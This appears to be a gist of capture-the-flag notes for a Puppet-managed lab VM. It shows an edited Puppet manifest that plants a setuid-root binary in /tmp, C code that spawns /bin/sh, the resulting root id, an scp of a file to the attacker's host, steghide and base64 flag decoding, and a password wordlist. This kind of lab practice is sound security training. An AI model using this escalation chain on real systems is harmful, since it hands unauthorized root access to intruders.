content => "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCTPnm+I5zEPNUHc1PgmsIxK8XCvtRECY6nTFOdNL3CxVBepWLv0wgPWBIUAkP9nfPUshXo1EIjcvb0+RGtJ8KNbVK4vW2ZCwgNicUoYnCcVtSrGtz9oAnKpeGcCKAuHG6ybt4Opxe75eF4dZt2/aDRrPMw8PK8l8a3o9ZdJlIgdLiWORPiga/zUu1zuySkQPFHzPBp29MvWVwAYsssEjcXINfuvysPbdBzMJaJ2o4jmFV9g/uCz3xjRi9zULP1VpoRYtZUQadU2CpuN1RtVDeoSeYVe6vYkeLz6rCBQTUfi9Nea4X1JtvaTfnrquRMWOr43WnMMcdFpIsBd8oCI4jH root@puppet", | |
} | |
} | |
cd /etc/puppet/modules/fiveeights/manifests | |
cp init.pp /etc/puppet/ | |
export TERM=xterm | |
vi init.pp | |
file { [ "/tmp/spin" ]: | |
ensure => present, | |
mode => 4755, | |
owner => root, | |
group => root, | |
source => "puppet:///modules/wiggle/spin"; | |
} | |
wait for puppet to push the file to tmp | |
ssh -i nleeson_key nleeson@192.168.122.3 | |
cd tmp/ | |
./spin | |
id | |
uid=1000(nleeson) gid=1000(nleeson) euid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(nleeson) | |
cd /root | |
ls -alh | |
file me.jpeg | |
me.jpeg: JPEG image data, JFIF standard 1.01 | |
scp me.jpeg root@192.168.43.95:/root/Desktop | |
steghide --extract -sf me.jpeg | |
reticulatingsplines | |
wrote extracted data to "primate_egyptian_flag.txt". | |
cat primate_egyptian_flag.txt | |
Hex Code | |
674143496741434967414349674143496741434967414349674143496741 | |
69434b34694c7555336235426963765a47497a4e5859694269636c526d62 | |
6c5a4749684279636e556d636c686b430a67414349674143496741434967 | |
41434967414349674143496741434967414349674143494b386c4c743053 | |
4c7538464967414349674143496734534c73414349674143496741434967 | |
4143490a6741434967414349674143496741434967414349674143496741 | |
43496741434967414349674143494b34435967414349674143496763794a | |
74347958663543586742434938424349674143490a663931586639315866 | |
393158663931586639315875307a4b7273434c6741434967414349674143 | |
4967416943634243496734434c6741795867414349674143496741795867 | |
414358674143490a39305450393054503930545039305450393054503934 | |
796276396d4c666843496741434967414349674143494b77484967414349 | |
3878335838394666663931586639315838783358703831580a3842434967 | |
414349674143496741434967414349674143496e346e6667414349674143 | |
496741434967414349676f41666741434967774866397758503831545039 | |
30545039774866393054500a677746496741434967414349674143496741 | |
434967414349674143496741434967414349674143496741434967414349 | |
4b384349673847497642794a2b424749674143496741794a2b4243490a67 | |
636966674243496741434967414349674143496741434967414349674143 | |
4967414349674143496741434967414349674143494b3843496738474976 | |
4243496741434963426d66764143490a765a47496b355759673457616864 | |
575967553259753947493139576567384764674d6e62766c476468785764 | |
30466d636e353262447067434b41794a7434795866393158753043596741 | |
43490a673847646751575a704a486467556d646e6b6b434b4153496e4647 | |
626d7077637068476467636d62704a5864304258596a4269627642535a74 | |
6c476467674764346c326367554761304269630a734233636852585a7442 | |
7964764a486130425362764a6e5a676b5859334647496c5a336274427962 | |
3042434c6c4a585a6f424364704a474968424363314279636e3557616f52 | |
4849346c57620a3042435a6c6c33627135575a67556d6468684749313957 | |
6567554763766847494a42694c7a646d627068476467515859674d486470 | |
3947627768585a6749575a3342435a75466d43306c32620a774258596755 | |
6d596751476231393264675133596c423363684279637068476467343262 | |
67733259684a475a6c566d5a4b495864766c48496b355759673432627052 | |
6e6376424849304647610a6a563263674d57613046576276525864684279 | |
626b427962304243646c4e48496c4a5859674d58545742535a7a56476130 | |
42434c6c5233627542695a507067437551575a304657616a566d630a674d | |
335a756c4761304243636c56326167384764675148616e563362674d5861 | |
6f524849764e6e437351585a774258647742795a756c3263314279636c52 | |
58596b425864676b4864704a58640a4331474d6b3557595342434c754e6a | |
5179314749765248497a746d6268684764676b6e6268316b434b34535a73 | |
4233626c42484979396d5a6767325a31396d626c42795970315759756c48 | |
5a0a354279617546476130424362686c32596c42336367456b434b346952 | |
554e45497a6c47613042795a756c47647a564764674933626d4269657535 | |
57613256326167516d62684269576c5258650a685a6e436c68476467516d | |
62684279636c646d626c78476268683259675532636c6847646777476268 | |
42795a756c47647a394761674933626d427961786b576230427a5a673847 | |
64675533620a68424364755632596c4a48497a6c4761674933626d426962 | |
7a496d637442796230424364686847496c68476467593262674158613042 | |
53516734535a6a6c6d646b4647496c786d59685648620a765a47496e3557 | |
61723932627342535a7946474931395765675957616749585a3052586133 | |
52484979394749444a565367343262675557624b5158614942694c6c4e6d | |
6268523363704e33630a30564762773132624442434c7539474976646b43 | |
4b34535a6e35575a737857596f4e6d436c6847646751575a305647627731 | |
32626a42535a324647616749336267516e6270684749684269630a7a526d | |
626c6c6d6347426963313945496d394749784d43496c5232627a6c47636c | |
42695a7642534e306f7a4e774179623042434d7a6f6a4e7741694f6c7832 | |
59796c3259675547613042535a0a676f77507534694c7534326270523359 | |
6c356d62764e47496c684764674d334a304647615842694c7555544f3545 | |
4449444a6b51676b79516f414361304a33624f42535a6f526c43756c4549 | |
0a6741434967414349674143496741434967414349674143496741434967 | |
414349674143496741434967414349674143496741434967414349674143 | |
49674143496741434967414349674143490a3d6f515a794657623068325a | |
http://www.unit-conversion.info/texttools/hexadecimal/ | |
gACIgACIgACIgACIgACIgACIgACIgAiCK4iLuU3b5BicvZGIzNXYiBiclRmblZGIhBycnUmclhkC | |
gACIgACIgACIgACIgACIgACIgACIgACIgACIK8lLt0SLu8FIgACIgACIg4SLsACIgACIgACIgACI | |
gACIgACIgACIgACIgACIgACIgACIgACIgACIgACIK4CYgACIgACIgcyJt4yXf5CXgBCI8BCIgACI | |
f91Xf91Xf91Xf91Xf91Xu0zKrsCLgACIgACIgACIgAiCcBCIg4CLgAyXgACIgACIgAyXgACXgACI | |
90TP90TP90TP90TP90TP94ybv9mLfhCIgACIgACIgACIKwHIgACI8x3X89Fff91Xf91X8x3Xp81X | |
8BCIgACIgACIgACIgACIgACIn4nfgACIgACIgACIgACIgoAfgACIgwHf9wXP81TP90TP9wHf90TP | |
gwFIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIK8CIg8GIvByJ+BGIgACIgAyJ+BCI | |
gcifgBCIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIK8CIg8GIvBCIgACIcBmfvACI | |
vZGIk5WYg4WahdWYgU2Yu9GI19Weg8GdgMnbvlGdhxWd0Fmcn52bDpgCKAyJt4yXf91Xu0CYgACI | |
g8GdgQWZpJHdgUmdnkkCKASInFGbmpwcphGdgcmbpJXd0BXYjBibvBSZtlGdggGd4l2cgUGa0Bic | |
sB3chRXZtBydvJHa0BSbvJnZgkXY3FGIlZ3btByb0BCLlJXZoBCdpJGIhBCc1Bycn5WaoRHI4lWb | |
0BCZll3bq5WZgUmdhhGI19WegUGcvhGIJBiLzdmbphGdgQXYgMHdp9GbwhXZgIWZ3BCZuFmC0l2b | |
wBXYgUmYgQGb192dgQ3YlB3chBycphGdg42bgs2YhJGZlVmZKIXdvlHIk5WYg42bpRncvBHI0FGa | |
jV2cgMWa0FWbvRXdhBybkByb0BCdlNHIlJXYgMXTWBSZzVGa0BCLlR3buBiZPpgCuQWZ0FWajVmc | |
gM3ZulGa0BCclV2ag8GdgQHanV3bgMXaoRHIvNnCsQXZwBXdwByZul2c1ByclRXYkBXdgkHdpJXd | |
C1GMk5WYSBCLuNjQy1GIvRHIztmbhhGdgknbh1kCK4SZsB3blBHIy9mZgg2Z19mblByYp1WYulHZ | |
5ByauFGa0BCbhl2YlB3cgEkCK4iRUNEIzlGa0ByZulGdzVGdgI3bmBieu5Wa2V2agQmbhBiWlRXe | |
hZnClhGdgQmbhBycldmblxGbhh2YgU2clhGdgwGbhByZulGdz9GagI3bmByaxkWb0BzZg8GdgU3b | |
hBCduV2YlJHIzlGagI3bmBibzImctByb0BCdhhGIlhGdgY2bgAXa0BSQg4SZjlmdkFGIlxmYhVHb | |
vZGIn5War92bsBSZyFGI19WegYWagIXZ0RXa3RHIy9GIDJVSg42bgUWbKQXaIBiLlNmbhR3cpN3c | |
0VGbw12bDBCLu9GIvdkCK4SZn5WZsxWYoNmClhGdgQWZ0VGbw12bjBSZ2FGagI3bgQnbphGIhBic | |
zRmbllmcGBic19EIm9GIxMCIlR2bzlGclBiZvBSN0ozNwAyb0BCMzojNwAiOlx2Yyl2YgUGa0BSZ | |
gowPu4iLu42bpR3Yl5mbvNGIlhGdgM3J0FGaXBiLuUTO5EDIDJkQgkyQoACa0J3bOBSZoRlCulEI | |
gACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACIgACI | |
=oQZyFWb0h2Z | |
Seems like Reversed Single line of base64 | |
CkhlcmUncyBhIGZlbmRlciBiYXNzIGZvciB5b3UuLi4KCiAgICAgICAgICAgICAgICAgICAgICAg | |
ICAgICAgICAgICAsLS4gICAgICAgIF8uLS0tLl8KICAgICAgICAgICAgICAgICAgICAgICAgICAg | |
ICAgICB8ICBgXC5fXy4tJycgICAgICAgYC4KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | |
ICAgXCAgXyAgICAgICAgXyAgLC4gICBcCiAgICAgICAgICAgLCsrKz0uX19fX19fX19fX19fX19f | |
X18pX3x8X19fX19ffF98X3x8ICAgIHwKICAgICAgICAgIChfLm9vby49PT09PT09PT09PT09PT09 | |
PT09fHw9PT09PT18PXw9fHwgICAgfAogICAgICAgICAgICAgfn4nICAgICAgICAgICAgICAgICB8 | |
ICB+JyAgICAgIGB+JyBvIG8gIC8KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFwg | |
ICAvfmBcICAgICBvIG8gIC8KICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBgficg | |
ICAgYC0uX19fXy4tJyAKCgpDb25ncmF0dWxhdGlvbnMgdG8geW91IG9uY2UgYWdhaW4gYW5kIGZv | |
ciB0aGUgc2l4dGggdGltZSBvbiBjYXB0dXJpbmcgdGhpcwpmbGFnISAKCkkndmUgdHJpZWQgdG8g | |
bWl4IHRoaW5ncyB1cCBhIGJpdCBoZXJlLCB0byBtb3ZlIGF3YXkgZnJvbSB0aHJvdyBtZXRhc3Bs | |
b2l0CmFuZCB3ZWIgZXhwbG9pdHMgYXQgdGhpbmdzLiBJIGhvcGUgeW91IGhhdmUgZW5qb3llZCB0 | |
aGF0IHBvcnRpb24gYW5kIHlvdXIKZmVlZGJhY2sgb24gdGhpcyBhc3BlY3Qgd291bGQgYmUgYXBw | |
cmVjaWF0ZWQuCgpPZiBub3RlLCB0aGVzZSBWTXMgYXJlIHNldCB0byBkbyBhdXRvbWF0aWMgc2Vj | |
dXJpdHkgdXBkYXRlcyB1c2luZyBwdXBwZXQsCnNvIHRoaXMgb3VnaHQgdG8ga2VlcCB0aGluZ3Mg | |
ZHluYW1pYyBlbm91Z2ggZm9yIHBlb3BsZS4KCk1hbnkgdGhhbmtzIHRvIG1yQjNuLCBSYW5kMG1C | |
eXRlWiBhbmQga2V2aW5ueiBmb3IgdGVzdGluZyB0aGlzIENURi4KCkEgc3BlY2lhbCB0aGFuayB5 | |
b3UgdG8gZzB0bWkxayBmb3IgaG9zdGluZyBhbGwgdGhlc2UgY2hhbGxlbmdlcyBhbmQgdGhlCnZh | |
bHVhYmxlIGFkdmljZS4gQSB0aXAgb2YgdGhlIGhhdCB0byBtcmIzbiBmb3IgaGlzIHJlY2VudCBh | |
c3Npc3RhbmNlLiBIaXQKbWUgb24gSVJDIG9yIHR3aXR0ZXIgaWYgeW91IGFyZSBsb29raW5nIGZv | |
ciBhIGhpbnQgb3IgaGF2ZSBjb21wbGV0ZWQgdGhlCmNoYWxsZW5nZS4KCkdvIG9uLCBDb21wbGV0 | |
ZSB0aGUgY2lyY2xlOiAwNjozMCB0byAwNzo0NSBvZiBlcGlzb2RlICMxIG9mIE91ciBGcmllbmRz | |
IEluClRoZSBOb3J0aCAoQykgQkJDIDE5OTUuLiBXaGF0J3MgdGhlIGNvbm5lY3Rpb24uLi4uPwog | |
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | |
Z2h0bWFyZQo= | |
base64 -d code.txt | |
Here's a fender bass for you... | |
,-. _.---._ | |
| `\.__.-'' `. | |
\ _ _ ,. \ | |
,+++=._________________)_||______|_|_|| | | |
(_.ooo.===================||======|=|=|| | | |
~~' | ~' `~' o o / | |
\ /~`\ o o / | |
`~' `-.____.-' | |
Congratulations to you once again and for the sixth time on capturing this | |
flag! | |
I've tried to mix things up a bit here, to move away from throw metasploit | |
and web exploits at things. I hope you have enjoyed that portion and your | |
feedback on this aspect would be appreciated. | |
Of note, these VMs are set to do automatic security updates using puppet, | |
so this ought to keep things dynamic enough for people. | |
Many thanks to mrB3n, Rand0mByteZ and kevinnz for testing this CTF. | |
A special thank you to g0tmi1k for hosting all these challenges and the | |
valuable advice. A tip of the hat to mrb3n for his recent assistance. Hit | |
me on IRC or twitter if you are looking for a hint or have completed the | |
challenge. | |
Go on, Complete the circle: 06:30 to 07:45 of episode #1 of Our Friends In | |
The North (C) BBC 1995.. What's the connection....? |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
def reverse(string): | |
start=0 | |
end=len(string)-1 | |
str=[i for i in string] | |
while(start<end): | |
tmp=str[start] | |
str[start]=str[end] | |
str[end]=tmp | |
start=start+1 | |
end=end-1 | |
return ''.join(str) | |
print reverse('gACIgACIgACIgACIgACIgACIgACIgAiCK4iLuU3b5BicvZGIzNXYiBiclRmblZGIhBycnUmclhkC') #include <unistd.h> | |
int main() { | |
char *args[2]; | |
args[0] = "/bin/sh"; | |
args[1] = NULL; | |
execve(args[0], args, NULL); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <unistd.h> | |
int main() { | |
char *args[2]; | |
args[0] = "/bin/sh"; | |
args[1] = NULL; | |
execve(args[0], args, NULL); | |
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Orleans | |
rising | |
gambler | |
mother | |
tailor | |
sweetheart | |
suitcase | |
satisfied | |
glasses | |
around | |
pleasure | |
rambling | |
sister | |
platform | |
almost | |
house | |
neworleans | |
therisingsun | |
poorgirl | |
bluejeans | |
jeans | |
blue | |
trunk | |
root | |
administrator | |
guest | |
krbtgt | |
domains | |
admins | |
bin | |
none | |
eric | |
burdon | |
ericburdon |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment